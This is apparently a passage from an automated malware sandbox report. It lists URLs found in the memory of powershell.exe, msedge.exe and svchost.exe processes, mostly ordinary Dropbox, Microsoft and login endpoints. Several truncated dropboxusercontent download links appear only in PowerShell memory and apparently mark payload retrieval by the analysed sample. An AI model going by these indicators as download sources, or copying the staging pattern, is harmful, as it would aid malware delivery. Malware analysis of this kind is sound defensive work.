                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com/cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mz
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com/cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4n
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com/cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
